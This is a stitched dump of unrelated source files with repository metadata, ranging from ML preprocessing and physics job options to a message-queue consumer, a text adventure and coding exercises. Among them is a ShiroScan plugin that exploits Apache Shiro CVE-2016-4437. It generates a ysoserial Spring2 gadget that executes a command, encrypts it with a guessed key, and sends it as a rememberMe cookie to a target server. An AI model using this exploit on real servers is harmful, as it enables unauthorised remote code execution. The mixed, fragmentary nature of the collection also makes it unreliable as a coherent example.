df.knowledge = df.knowledge.apply(lambda x: ' '.join([label for label in x.split() if label in top_k]))
df['label'] = df[['subject', 'topic', 'knowledge']].apply(lambda x: ' '.join(x), axis=1)
return df[['label', 'content']]
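# Illustrative note: after extract_label, each row looks roughly like
#   label   = '<subject> <topic> <knowledge_1> ... <knowledge_n>'
#   content = '<cleaned question text>'
# where knowledge points occurring in less than `freq` of the samples have been
# dropped from the label string.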
def create_bert_data(df, small=False):
"""
    Preprocessing for BERT.
    If small=True: use a small sample so the model can be exercised on a weak local machine.
    This function writes the three BERT data splits (train, dev, test).
"""
df['content'] = df['content'].apply(lambda x: x.replace(' ', ''))
if small:
print('use small dataset to test my local bert model really work')
train = df.sample(128)
dev = df.sample(64)
test = df.sample(64)
else:
train, test = train_test_split(df, test_size=0.2, random_state=2020)
train, dev = train_test_split(train, test_size=0.2, random_state=2020)
print('preprocess for bert!')
print('create 3 tsv file(train, dev, test) in %s' % (os.path.join(ROOT, 'data')))
train.to_csv(TRAIN_TSV, index=None, sep='\t')
dev.to_csv(DEV_TSV, index=None, sep='\t')
test.to_csv(TEST_TSV, index=None, sep='\t')
def load_stopwords():
return {line.strip() for line in open(STOPWORDS, encoding='UTF-8').readlines()}
def sentence_preprocess(sentence):
    # remove punctuation / non-Chinese characters
r = re.compile("[^\u4e00-\u9fa5]+|题目")
    sentence = r.sub("", sentence)  # delete everything that is not a Chinese character
    # word segmentation
words = jieba.cut(sentence, cut_all=False)
    # remove stopwords
stop_words = load_stopwords()
words = [w for w in words if w not in stop_words]
return words
def df_preprocess(df):
"""
    Combines punctuation removal, word segmentation and stopword removal.
:param df:
:return:
"""
df.content = df.content.apply(sentence_preprocess)
return df
def create_testcnn_data(df, num_words=50000, maxlen=128):
    # process the labels
mlb = MultiLabelBinarizer()
y = mlb.fit_transform(df.label.apply(lambda label: label.split()))
with open(LABELS_FILE, mode='w', encoding='utf-8') as f:
for label in mlb.classes_:
f.write(label+'\n')
    # process the content
tokenizer = Tokenizer(num_words=num_words, oov_token="<UNK>")
tokenizer.fit_on_texts(df.content.tolist())
x = tokenizer.texts_to_sequences(df.content)
x = pad_sequences(x, maxlen=maxlen, padding='post', truncating='post') # padding
    # save the arrays
np.save(X_NPY, x)
np.save(Y_NPY, y)
    print('Created and saved x, y to:\n {} \n {}'.format(X_NPY, Y_NPY))
    # also save the tokenizer and the multi_label_binarizer;
    # otherwise the numeric ids cannot be mapped back to text after training
    tb = {'tokenizer': tokenizer, 'binarizer': mlb}  # store both in one dict
with open(TOKENIZER_BINARIZER, 'wb') as f:
pickle.dump(tb, f)
    print('Created and saved tokenizer and binarizer to:\n {}'.format(TOKENIZER_BINARIZER))
def load_testcnn_data():
"""
    Saving six separate files would be cumbersome,
    so x and y are loaded here and split into train/dev/test on the fly.
"""
    # keep consistent with the BERT preprocessing above
x = np.load(X_NPY).astype(np.float32)
y = np.load(Y_NPY).astype(np.float32)
    # same split scheme as used for BERT
train_x, test_x, train_y, test_y = train_test_split(x, y, test_size=0.2, random_state=2020)
train_x, dev_x, train_y, dev_y = train_test_split(train_x, train_y, test_size=0.2, random_state=2020)
return train_x, dev_x, test_x, train_y, dev_y, test_y
def load_tokenizer_binarizer():
"""
    Load the tokenizer and the binarizer
:return:
"""
with open(TOKENIZER_BINARIZER, 'rb') as f:
tb = pickle.load(f)
return tb['tokenizer'], tb['binarizer']
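# Illustrative sketch (hypothetical variable names): mapping model output back
# to label strings with the saved binarizer.
#   tokenizer, mlb = load_tokenizer_binarizer()
#   y_pred = (model.predict(x) > 0.5).astype(int)   # multi-hot predictions
#   labels = mlb.inverse_transform(y_pred)          # tuples of label strings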
def main():
"""
    Run the full preprocessing pipeline defined above
"""
    data_path = unzip_data()  # unzip
    df = combine_data(data_path)  # merge
    df = extract_label(df)  # extract labels
    # preprocessing for BERT
create_bert_data(df)
    # preprocessing for TextCNN and Transformer
    df = df_preprocess(df)  # clean, segment and remove stopwords
create_testcnn_data(df, num_words=50000, maxlen=128)
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
4cb105211199b388e964f55bb905a04d35572cf9 | b22588340d7925b614a735bbbde1b351ad657ffc | /athena/LArCalorimeter/LArTest/LArConditionsTest/share/FixLArElecCalib_fix6_jobOptions.py | 59efd81bb72cab9f075cafd0a9f3b68c0147137b | [] | no_license | rushioda/PIXELVALID_athena | 90befe12042c1249cbb3655dde1428bb9b9a42ce | 22df23187ef85e9c3120122c8375ea0e7d8ea440 | refs/heads/master | 2020-12-14T22:01:15.365949 | 2020-01-19T03:59:35 | 2020-01-19T03:59:35 | 234,836,993 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,813 | py | ###############################################################
#
# Job options file 1
#
#==============================================================
#use McEventSelector
include( "AthenaCommon/Atlas_Gen.UnixStandardJob.py" )
from AthenaCommon.DetFlags import DetFlags
DetFlags.Calo_setOn()
DetFlags.ID_setOff()
DetFlags.Muon_setOff()
DetFlags.Truth_setOff()
DetFlags.LVL1_setOff()
DetFlags.digitize.all_setOff()
from AthenaCommon.GlobalFlags import GlobalFlags
GlobalFlags.DataSource.set_geant4()
GlobalFlags.InputFormat.set_pool()
GlobalFlags.DetGeo.set_atlas()
DetDescrVersion = "ATLAS-CSC-02-00-00"
# DetDescrVersion = "ATLAS-DC3-05"
# LArIdMapFix=7
# G4Phys ="QGSP_EMV"
# G4Phys ="QGSP_BERT"
# Switches:
# items
RunNumber = 1
#
RecreateFolder = False
WriteIOV = True
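# RecreateFolder: only set True the first time, to create the COOL folder
# structure (used below via IOVRegSvc.RecreateFolders).
# WriteIOV: if True, the objects written to POOL are also registered in the
# IOV database by OutputConditionsAlg.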
# Objects and its tag
ObjectList = []
TagList = []
# FIX
if DetDescrVersion == "ATLAS-CSC-02-00-00" :
TagNameForFix = "CSC02-F"
else :
TagNameForFix = "Wrong"
print " ERROR: wrong DetDescrVersion"
ObjectList += ["LArNoiseMC#LArNoise#/LAR/ElecCalibMC/Noise"]
ObjectList += ["LAruA2MeVMC#LAruA2MeV#/LAR/ElecCalibMC/uA2MeV"]
ObjectList += ["LArDAC2uAMC#LArDAC2uA#/LAR/ElecCalibMC/DAC2uA"]
ObjectList += ["LArRampMC#LArRamp#/LAR/ElecCalibMC/Ramp"]
TagList += ["LARElecCalibMCNoise-"+TagNameForFix]
TagList += ["LARElecCalibMCuA2MeV-"+TagNameForFix]
TagList += ["LARElecCalibMCDAC2uA-"+TagNameForFix]
TagList += ["LARElecCalibMCRamp-"+TagNameForFix]
OutputPOOLFileName = "LArFCalADC2MeV_13.0.30_v1.pool.root"
#/--------------------------------------------------------------
# Algorithm to fix the LAr Id, if needed
#/-------------------------------
theApp.Dlls += [ "LArConditionsTest" ]
theApp.TopAlg += [ "FixLArElecCalib" ]
FixLArElecCalib = Algorithm("FixLArElecCalib")
# 1=
# 2=fix for IdMapFix=1
# 3=new fsample for CSC-02
# 5=new FCAL noise and minbias
FixLArElecCalib.FixFlag =6
#--------------------------------------------------------------
# Private Application Configuration options
#--------------------------------------------------------------
theApp.Dlls += [ "LArTools" ]
include ("AtlasGeoModel/SetGeometryVersion.py")
include ("AtlasGeoModel/GeoModelInit.py")
# Other LAr related
include( "LArIdCnv/LArIdCnv_joboptions.py" )
include( "CaloDetMgrDetDescrCnv/CaloDetMgrDetDescrCnv_joboptions.py" )
include( "IdDictDetDescrCnv/IdDictDetDescrCnv_joboptions.py" )
include( "LArConditionsCommon/LArConditionsCommon_MC_jobOptions.py" )
include( "LArConditionsCommon/LArIdMap_MC_jobOptions.py" )
#--------------------------------------------------------------
EventSelector = Service( "EventSelector" )
EventSelector.RunNumber=1
#EventSelector.EventsPerRun=10;
EventSelector.EventsPerRun=2
EventSelector.FirstEvent=1
# theApp.Dlls += [ "PoolSvc", "AthenaPoolCnvSvc", "AthenaPoolCnvSvcPoolCnv", "EventAthenaPoolPoolCnv", "EventSelectorAthenaPool" ]
include( "AthenaPoolCnvSvc/AthenaPool_jobOptions.py" )
theApp.Dlls += [ "AthenaPoolCnvSvc" ]
theApp.Dlls += [ "LArCondAthenaPoolPoolCnv" ]
include( "AthenaSealSvc/AthenaSealSvc_joboptions.py" )
# AthenaSealSvc.CheckDictAtInit = True
include ("LArRawConditions/LArRawConditionsDict_joboptions.py")
# include ("LArTools/LArToolsDict_joboptions.py")
theApp.EvtMax=1
AthenaEventLoopMgr=Service("AthenaEventLoopMgr")
AthenaEventLoopMgr.OutputLevel = INFO
MessageSvc = Service( "MessageSvc" )
MessageSvc.OutputLevel = INFO
MessageSvc.defaultLimit = 1000000;
MessageSvc.Format = "% F%20W%S%7W%R%T %0W%M"
theApp.Dlls += [ "GaudiAud" ]
theAuditorSvc = AuditorSvc()
theAuditorSvc.Auditors = [ "ChronoAuditor" ]
##############################################
# Writing POOL and COOL
if len(ObjectList)>0 :
# include regstration alg (default is WriteIOV = False)
include("RegistrationServices/OutputConditionsAlg_jobOptions.py")
# List of objects container type#key#foldername
OutputConditionsAlg.ObjectList = ObjectList
OutputConditionsAlg.IOVTagList = TagList
ToolSvc = Service("ToolSvc")
ToolSvc.ConditionsAlgStream.OutputFile = OutputPOOLFileName
# Set flag to register and run interval Run1/Event1 to Run2/Event2
# Usually, only need to set Run1, others go to default
####
OutputConditionsAlg.WriteIOV = WriteIOV
OutputConditionsAlg.Run1 = 0
OutputConditionsAlg.LB1 = 0
# Set the connection string
include ( "IOVDbSvc/IOVDbSvc_jobOptions.py" )
IOVDbSvc = Service( "IOVDbSvc" )
IOVDbSvc.dbConnection="impl=cool;techno=sqlite;schema=LArElecCalib_FCalADC2MeV.db;X:OFLP200"
# For schema creation - only should be used when creating the folder,
# i.e. the first time
IOVRegSvc = Service( "IOVRegistrationSvc" )
IOVRegSvc.OutputLevel = DEBUG
IOVRegSvc.RecreateFolders = RecreateFolder
# PoolSvc.FileOpen = "update"
###########################################################################
| [
"[email protected]"
] | |
86e96ae863d4f9f1817fcae036de87f3df2a15ec | e694891ff8c9d06df7b7b5def7ba71c1dba03aa8 | /rabbitmq_rabbitpy/test_rabbitmq.py | 23f166795359b1166e1d5e54aa4a636cf2e3c2e1 | [] | no_license | wangyu190810/python-skill | 78f9abb39ebfa01b92ffb2ec96c7ef57c490d68d | 719d082d47a5a82ce4a15c57dd481932a9d8f1ba | refs/heads/master | 2020-04-05T17:43:48.005145 | 2019-02-01T01:45:49 | 2019-02-01T01:45:49 | 41,524,479 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 962 | py | # -*-coding:utf-8-*-
# email:[email protected]
__author__ = 'wangyu'
import rabbitpy
# with rabbitpy.Connection("amqp://guest:guest@localhost:5672/%2F") as conn:
# with conn.channel() as channel:
# amqp = rabbitpy.AMQP(channel)
#
# for message in amqp.basic_consume('queue-name'):
# print(message)
#
# import rabbitpy
with rabbitpy.Connection('amqp://guest:guest@localhost:5672/%2f') as conn:
with conn.channel() as channel:
queue = rabbitpy.Queue(channel, 'example')
while len(queue) > 0:
message = queue.get()
print 'Message:'
print ' ID: %s' % message.properties['message_id']
print ' Time: %s' % message.properties['timestamp'].isoformat()
print ' Body: %s' % message.body
message.ack()
print 'There are %i more messages in the queue' % len(queue)
| [
"[email protected]"
] | |
fb9705a0d1b4b5da9c80db0e6507fd386d90b160 | f28a261132fbf98f5ebfd004672af4155dfa1cc5 | /nanodash/service/dataset-description-nano-090.py | b6fd62ced21821aab7733a8570b3d22d64d38b3d | [
"Apache-2.0",
"MIT"
] | permissive | curtislisle/nanomaterial-dashboard | 8704779b7410747092c8fdb9326fb69b9f6b94ff | 06de2e0782f53ce56d6edd0937b14cbd738fc22a | refs/heads/master | 2021-01-21T04:41:16.713855 | 2016-07-08T01:07:17 | 2016-07-08T01:07:17 | 54,521,714 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,213 | py | #import bson
import pymongo
import json
from bson import ObjectId
from pymongo import MongoClient
import string
import tangelo
def run(ipaddress):
# Create an empty response object.
response = {}
response['datasource'] = 'remote'
response['file'] = "http://"+str(ipaddress)+":8080/nanodash/service/dataset-content-nano-090/NanoDB3/Nano_combined_0301"
response['name'] = "Nano Database Dashboard v0.9.0"
response['separator'] = ','
response['skip'] = 0
response['meta'] = [
{ "type": "id", "name": "NanomaterialID" },
{ "type": "string", "name": "Molecular Identity" },
{ "type": "string", "name": "Material Type" },
{ "type": "string", "name": "Molecular Type" },
{"type":"string","name":"Product Name"},
# {'name':'Mean Hydrodynamic Diameter','type':'float'},
{'name':'Mean Primary Particle Size','type':'float'},
# {'name':'Component Molecular Weight','type':'float'},
# {'name':'Molecular Weight','type':'float'},
{'name':'Lambda Max','type':'float'},
# {'name':'Bulk Density','type':'float'},
# {'name':'Primary Particle Size','type':'float'},
{'name':'Specific Surface Area','type':'float'},
{'name':'Zeta Potential','type':'float'}
]
response['sets'] = [
{ "format": "binary", "start": 1, "end": 5}]
response['setlist'] = ['2D Dimensionality','3D Dimensionality','Metal','Metal Oxide','Polymer','Carbohydrate',
'Protein','Nucleic Acid','Group Ii-Vi','Dendrimer','Lipid','Group Iv - Non C',
'Agglomerated','Aggregated','Positive Polarity','Negative Polarity','Purity99+','IsCrystalline',
'Aromatic','Macrocyclic','Sugar','VHQ-R subset', 'UHQ-R subset',
'source_pdf','source_nano_db']
#'Monoclinic','SingleCrystal','Polycrystalline','Amorphous','Anatase','Tetragonal','Rutile','Cubic','Brookite','Wurtzite','Zincite']
response['attributelist'] = []
response['author'] = 'ABCC IVG & KnowledgeVis'
response['description'] = 'Nanomaterial database v2'
response['source'] = "Nanomaterials reference database"
#tangelo.log(str(response))
return json.dumps(response)
| [
"[email protected]"
] | |
e173dd44edd47d50ac75298a2927da10f8cb5fc5 | a95236e2dccd588627c6f0a1542f37e26f6899f3 | /Chap04Functions/3-1-1.函数对象.py | a969ddb2ef7cb3670e7c3c086c3b5e4d44527a9f | [
"MIT"
] | permissive | royqh1979/programming_with_python | 43b1cf0ab1b6a54ad165e30991250cf7bf318bd6 | aa0603058f40b5bc7406e92c92134ee34f3b15e2 | refs/heads/master | 2023-06-11T02:11:59.590880 | 2023-05-29T06:39:03 | 2023-05-29T06:39:03 | 166,190,796 | 5 | 4 | MIT | 2023-02-15T23:13:33 | 2019-01-17T08:38:56 | Python | UTF-8 | Python | false | false | 70 | py | def fun1():
print("this is fun1")
print(fun1)
fun1=34
print(fun1) | [
"[email protected]"
] | |
bb32c9b355ff5984723a6f55c49c36cdbc32e17c | da280a226bbf15d7243410c0d3930bdca00d0088 | /firsttry/ex41.py | 0ba10ceba34cd4003844fa210c2ed0733881e028 | [] | no_license | c4collins/PyTHWay | 174cae57c73431ce5bfc90a361613c5db5c846d7 | 135b4b908ef2698084ee1b3fb9f1e5550c3c8843 | refs/heads/master | 2021-01-10T18:29:43.998528 | 2012-11-03T22:53:17 | 2012-11-03T22:53:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,767 | py | from sys import exit
from random import randint
def death():
quips = ["You died. You kinda suck at this.", "Your mum would be proud, if she were smarter.", "Such a loser.", "I have a small puppy that's better at this."]
print quips[randint(0, len(quips)-1)]
exit(1)
def princess_lives_here():
print "You see a beautiful princess with a shiny crown."
print "She offers you some cake."
eat_it = raw_input("> ")
if eat_it == "eat it":
print "You explode like a pinata full of frogs."
print "The princess cackles and eats the frogs. Yum!"
return 'death'
elif eat_it == "do not eat it":
print "She throws the cake at you and it cuts off your head."
print "The last thing you see if her munching on your torso. Yum!"
return 'death'
elif eat_it == "make her eat it":
print "The princess screams as you cram the cake in her mouth."
print "The she smiles and cries and thanks you for saving her."
print "She points to a tiny door and says, 'The Koi needs cake too.'"
print "She gives you the very last bit of cake and shoves you in."
return 'gold_koi_pond'
else:
print "The princess looks at you confused and just points at the cake."
return 'princess_lives_here'
def gold_koi_pond():
print "There is a garden with a koi pond in the centre."
print "You walk close and see a massive fin poke out."
print "You peek in and a creepy looking huge Koi stares at you."
print "It opens its mouth waiting for food."
feed_it = raw_input("> ")
if feed_it == "feed it":
print "The Koi jumps up, and rather than eating the cake, eats your arm."
print "You fall in and the Koi shrugs then eats you."
print "You are then pooped out sometime later."
return 'death'
elif feed_it == "do not feed it":
print "The Koi grimaces, then thrashes around for a second."
print "If rushes to the other side of the pong, braces against the wall..."
print "The it *lunges* out of the water, up in the air and over your"
print "entire body, cake and all."
print "You are pooped out about a week later."
return 'death'
elif feed_it == "throw it in":
print "The Koi wiggles, then leaps into the air to eat the cake."
print "You can see it's happy, it gruts, thrashes..."
print "and finally rolls over and poops a magic diamond into the air."
print "It lands at your feet."
return 'bear_with_sword'
else:
print "The Koi gets annoyed and wiggles a bit."
        return 'gold_koi_pond'
def bear_with_sword():
print "Puzzled, you are about to pick up the fish poop diamond when"
print "a bear bearing a load bearing sword walks in."
print "\"Hey, that's MY diamond! Where'd you get that!?\""
print "It holds its paw out and looks at you."
give_it = raw_input("> ")
if give_it == "give it":
print "The bear swipes at your hand to grab the diamond and"
print "rips your hand off in the process. It then looks at"
print "your bloody stump and says \"Oh crap, sorry about that.\""
print "It tries to put your hand back on, but you collapse."
print "The last thing you see is the bear shrug and eat you."
return 'death'
elif give_it == "say no":
print "The bear looks shocked. Nobody ever told a bear"
print "with a broadsword 'no'. It asks, "
print "\"Is it because it's not a katana? I could go get one!\""
print "It then runs off and you notice a big iron gate."
print "\"Where the hell did that come from?\" You say."
return 'big_iron_gate'
else:
print "The bear looks puzzled as to why you'd do that."
return 'bear_with_sword'
def big_iron_gate():
print "You walk up to the big iron gate and see there's a handle."
open_it = raw_input("> ")
if open_it == "open it":
print "You open it and you are free!"
print "There are mountains. And berries! And..."
print "Oh, but then the bear comes with his katana and stabs you."
print "\"Who's laughing now!? Love this katana.\""
return 'death'
else:
print "That doesn't seem sensible. I mean, the door's right there."
return 'big_iron_gate'
ROOMS = {'death': death, 'princess_lives_here': princess_lives_here, 'gold_koi_pond': gold_koi_pond, 'big_iron_gate': big_iron_gate, 'bear_with_sword': bear_with_sword}
def runner(map, start):
next = start
while True:
room = map[next]
print "\n--------"
next = room()
runner(ROOMS, 'princess_lives_here')
| [
"[email protected]"
] | |
faa87c8e3f067bcd7755c759e47e022742482bb8 | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /wbhjXmdbPSxCSE5hW_0.py | e9536e0fed2a7c9b48f0291977cccbacbce5b686 | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,262 | py | """
A magic sigil is a glyph which represents a desire one wishes to manifest in
their lives. There are many ways to create a sigil, but the most common is to
write out a specific desire (e.g. " _I HAVE WONDERFUL FRIENDS WHO LOVE ME_ "),
remove all vowels, remove any duplicate letters (keeping the last occurence),
and then design a glyph from what remains.
Using the sentence above as an example, we would remove duplicate letters:
AUFRINDSWHLOVME
And then remove all vowels, leaving us with:
FRNDSWHLVM
Create a function that takes a string and removes its vowels and duplicate
letters. The returned string should not contain any spaces and be in
uppercase.
### Examples
sigilize("i am healthy") ➞ "MLTHY"
sigilize("I FOUND MY SOULMATE") ➞ "FNDYSLMT"
sigilize("I have a job I enjoy and it pays well") ➞ "HVBJNDTPYSWL"
### Notes
* For duplicate letters the **last one** is kept.
* When performing actual sigil magic, you **must** make your sigils **manually**.
* Check the **Resources** tab for more info on sigils if you're interested in the concept.
"""
def sigilize(desire):
a = ''.join(desire.upper().split())
b = sorted(set(a), key=a.rindex)
return ''.join(i for i in b if i not in "AEIOU")
| [
"[email protected]"
] | |
e70cf9d6e63ff327f4103d60a0c7ba98634ec982 | 4d98abd2553e95856d835519424a60634fc4cdd3 | /CVE-2016-4437 Apache_Shiro_RCE/ShiroScan_1.2.4/moule/plugins/Spring2.py | 68bb19cf574477e3533d5a8f8ec6fe04827cd872 | [] | no_license | ANNS666/my_POC | 0157fa41bdd2d0f264e464b05bf9c75405083e44 | b3a38745609c9407a9bc0427f5dd55e4acfe6d70 | refs/heads/master | 2023-08-10T19:13:15.521562 | 2021-10-10T04:09:58 | 2021-10-10T04:09:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,658 | py | # -*- coding: utf-8 -*-
# By 斯文beast svenbeast.com
import os
import re
import base64
import uuid
import subprocess
import requests
import sys
import threadpool
from Crypto.Cipher import AES
from ..main import Idea
requests.packages.urllib3.disable_warnings()
JAR_FILE = 'moule/ysoserial.jar'
@Idea.plugin_register('Class26:Spring2')
class Spring2(object):
def process(self,url,command,resKey,func):
self.sendPayload(url,command,resKey)
def gcm_encode(self,resKey,file_body):
mode = AES.MODE_GCM
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(resKey), mode, iv)
ciphertext, tag = encryptor.encrypt_and_digest(file_body)
ciphertext = ciphertext + tag
payload = base64.b64encode(iv + ciphertext)
return payload
def cbc_encode(self,resKey,file_body):
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(resKey), mode, iv) #受key影响的encryptor
payload = base64.b64encode(iv + encryptor.encrypt(file_body))
return payload
def sendPayload(self,url,command,resKey,fp=JAR_FILE):
if not os.path.exists(fp):
raise Exception('jar file not found!')
popen = subprocess.Popen(['java', '-jar', fp, 'Spring2', command], #popen
stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ( (BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
file_body = pad(popen.stdout.read()) #受popen影响的file_body
payloadCBC = self.cbc_encode(resKey,file_body)
payloadGCM = self.gcm_encode(resKey,file_body)
header={
'User-agent' : 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0;'
}
try:
x = requests.post(url, headers=header, cookies={'rememberMe': payloadCBC.decode()+"="},verify=False, timeout=20) # 发送验证请求1
y = requests.post(url, headers=header, cookies={'rememberMe': payloadGCM.decode()+"="},verify=False, timeout=20) # 发送验证请求2
#print("payload1已完成,字段rememberMe:看需要自己到源代码print "+payload.decode())
if(x.status_code==200):
print("[+] ****Spring2模块 key: {} 已成功发送! 状态码:{}".format(str(resKey),str(x.status_code)))
else:
print("[-] ****Spring2模块 key: {} 发送异常! 状态码:{}".format(str(resKey),str(x.status_code)))
except Exception as e:
print(e)
return False
| [
"[email protected]"
] | |
b8fecdcd2f6db4c77f8c2dd91e69e1f8869ea920 | ff3da62ab2a336ba286ea320b8bf1eba5b1978ea | /normalization/time_Info/apm.py | e242dc16e93401a0d43eed4f9fa6c779d03c8403 | [] | no_license | llq20133100095/bert_ner_time | 9e17e9de77ff12b4ae5267986f646665066e070c | 9dc3baf5ca8f6d5cc7d4255bcfd913bd695c7b5e | refs/heads/master | 2021-10-28T14:59:17.217552 | 2019-04-24T06:12:22 | 2019-04-24T06:12:22 | 182,626,582 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,688 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2018/11/24 16:33
# @Author : honeyding
# @File : apm.py
# @Software: PyCharm
import re
class Apm:
apm_pat = re.compile(u'.*?(明早|傍晚|早上|早晨|凌晨|上午|中午|下午|大晚上|晚上|夜里|今晚|明晚|昨晚|前晚|这晚|晚|清晨|午后).*?')
apm_hour_pat = re.compile(u'.*?(明早|傍晚|早上|早晨|凌晨|上午|中午|下午|大晚上|晚上|夜里|今晚|明晚|昨晚|前晚|这晚|晚|清晨|午后).*?([0-9一二三四五六七八九两十]).*?')
def get_apm_info(self, entity, commonParser):
matcher = self.apm_pat.match(entity)
if matcher:
if commonParser:
commonParser.timeUnit[4] = True
return True
return False
def judge_apm_hour(self, entity, commonParser):
matcher = self.apm_hour_pat.match(entity)
if matcher:
if commonParser:
commonParser.timeUnit[4] = True
return True
return False
def adjustHours(self, entity, hour, commonParser):
if u"早" not in entity and u"上午" not in entity and u"晨" not in entity:
if u"中午" in entity:
if hour > 14 or hour > 2 and hour < 10:
print(u'不能是中午。')
commonParser.timeAPMInfo = str(hour) + u"点不能是中午。"
elif hour < 2 and hour > 0:
hour += 12
elif u"下午" not in entity and u"午后" not in entity:
if u"昨晚" in entity or u"明晚" in entity or u"傍晚" in entity or u"晚" in entity or u"晚上" in entity or u"夜里" in entity or u"今晚" in entity:
if hour > 12 and hour < 17 or hour >= 0 and hour < 5:
print(u'不能是晚上。')
commonParser.timeAPMInfo = str(hour) + u"点不能是晚上。"
elif hour >= 4 and hour <= 12:
hour += 12
else:
if hour > 0 and hour <= 12:
hour += 12
# if hour > 19 or hour < 1 or hour > 7 and hour < 12:
# print(u'不能是下午。')
# commonParser.timeAPMInfo = str(hour) + u'不能是下午。'
# elif hour > 0 and hour <= 7:
# hour += 12
elif hour > 12:
print(u'不能是上午或早上。')
commonParser.timeAPMInfo = str(hour) + u'点不能是上午或早上。'
return hour
if __name__ == '__main__':
apm_proc = Apm()
assert apm_proc.get_apm_info(u'早晨') is True | [
"[email protected]"
] | |
6e8da8e397cef33da10c132cc14befac799d08b6 | e23a4f57ce5474d468258e5e63b9e23fb6011188 | /125_algorithms/_exercises/templates/_algorithms_challenges/pybites/intermediate/030_movie_data_analysis/save1_nopass.py | de9624e5838b09cfbf6dd63a838b4df2ba2feb25 | [] | no_license | syurskyi/Python_Topics | 52851ecce000cb751a3b986408efe32f0b4c0835 | be331826b490b73f0a176e6abed86ef68ff2dd2b | refs/heads/master | 2023-06-08T19:29:16.214395 | 2023-05-29T17:09:11 | 2023-05-29T17:09:11 | 220,583,118 | 3 | 2 | null | 2023-02-16T03:08:10 | 2019-11-09T02:58:47 | Python | UTF-8 | Python | false | false | 1,495 | py | # _______ c__
# ____ c.. _______ d.., n..
# _______ __
# ____ u__.r.. _______ u..
#
# BASE_URL 'https://bites-data.s3.us-east-2.amazonaws.com/'
# TMP '/tmp'
#
# fname 'movie_metadata.csv'
# remote __.p...j.. B.. f..
# local __.p...j.. T.. f..
# u.. ? ?
#
# MOVIE_DATA local
# MIN_MOVIES 4
# MIN_YEAR 1960
#
# Movie n.. 'Movie', 'title year score'
#
#
# ___ get_movies_by_director
# """Extracts all movies from csv and stores them in a dict,
# where keys are directors, and values are a list of movies,
# use the defined Movie namedtuple"""
#
# d d.. l..
# full_list # list
#
# w__ o.. M.. newline='' __ file
# reader c__.D.. ?
# ___ row __ ?
# year ? 'title_year'
# __ ? !_ '' a.. i.. ? > 1960
# f__.a.. ? 'director_name' ? 'movie_title' .s.. i.. ? 'title_year' f__ ? 'imdb_score'
#
# ___ name, movie, year, score __ f..
# d name .a.. ? t.._m.. y.._y.. s.._s..
#
# r.. ?
#
#
# ___ calc_mean_score movies
# """Helper method to calculate mean of list of Movie namedtuples,
# round the mean to 1 decimal place"""
# scores movie.s.. ___ ? __ ?
# r.. r.. s.. ? / l.. ? 1
#
# ___ get_average_scores directors
# """Iterate through the directors dict (returned by get_movies_by_director),
# return a list of tuples (director, average_score) ordered by highest
# score in descending order. Only take directors into account
# with >= MIN_MOVIES"""
#
# p..
| [
"[email protected]"
] | |
f6781a69e1b2ae0d198cc5c11ac27d5d185fa49e | c3cc755ae500e87b6d5fa839efaa4d7d0f746d43 | /Part 1/Ch.6 Dictionaries/Nesting/pizza.py | f07401d2bb54c94f78013b95d7f88cd48287e6fd | [] | no_license | AngryGrizzlyBear/PythonCrashCourseRedux | 9393e692cdc8e5e28a66077bbc6c1e674642d209 | 28d48fa16fc238cf0409f6e987a3b4b72e956a92 | refs/heads/master | 2020-03-28T11:04:44.030307 | 2018-10-20T21:06:27 | 2018-10-20T21:06:27 | 148,175,301 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 312 | py | # Store information about a pizza being ordered.
pizza = {
'crust': 'thick',
'toppings': ['mushrooms', 'extra cheese'],
}
# Summarize the order
print("You ordered a " + pizza['crust'] + "-crust pizza " +
"with the following toppings:")
for topping in pizza['toppings']:
print("\t" + topping) | [
"[email protected]"
] | |
a381405f3e7de92702f28ddc67b8a4d3d57494cd | 7bd5ca970fbbe4a3ed0c7dadcf43ba8681a737f3 | /aoj/aoj-icpc/300/1315.py | fc47a7e25bc9e18a6c15f3d4e5a4aeac5a025693 | [] | no_license | roiti46/Contest | c0c35478cd80f675965d10b1a371e44084f9b6ee | c4b850d76796c5388d2e0d2234f90dc8acfaadfa | refs/heads/master | 2021-01-17T13:23:30.551754 | 2017-12-10T13:06:42 | 2017-12-10T13:06:42 | 27,001,893 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 575 | py | while 1:
n = int(raw_input())
if n == 0: break
exist = set([])
enter = [0]*1000
bless = [0]*1000
for loop in xrange(n):
md,hm,io,p = raw_input().split()
h,m = map(int,hm.split(":"))
t = 60*h+m
p = int(p)
if io == "I":
enter[p] = t
exist.add(p)
else:
exist.remove(p)
if p == 0:
for i in exist: bless[i] += t-max(enter[p],enter[i])
elif 0 in exist:
bless[p] += t-max(enter[0],enter[p])
print max(bless)
| [
"[email protected]"
] | |
f23c206436ec78827ec7cbc0ab57a7c924a38e64 | 70087a0720037639297825a66135b9c985bbf586 | /verif/metric.py | 93c65c9b670eb008b0ef357dbd97079fe6539478 | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | rvalenzuelar/verif | 1ab854e2433a69378af8a867a1fb6f0efd1a4de0 | 034188cabd3a29136433be2ecb2f6555d3c03da8 | refs/heads/master | 2020-03-30T21:39:27.128496 | 2018-05-13T16:04:38 | 2018-05-13T17:48:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 48,947 | py | import inspect
import metric_type
import numpy as np
import sys
import scipy.stats
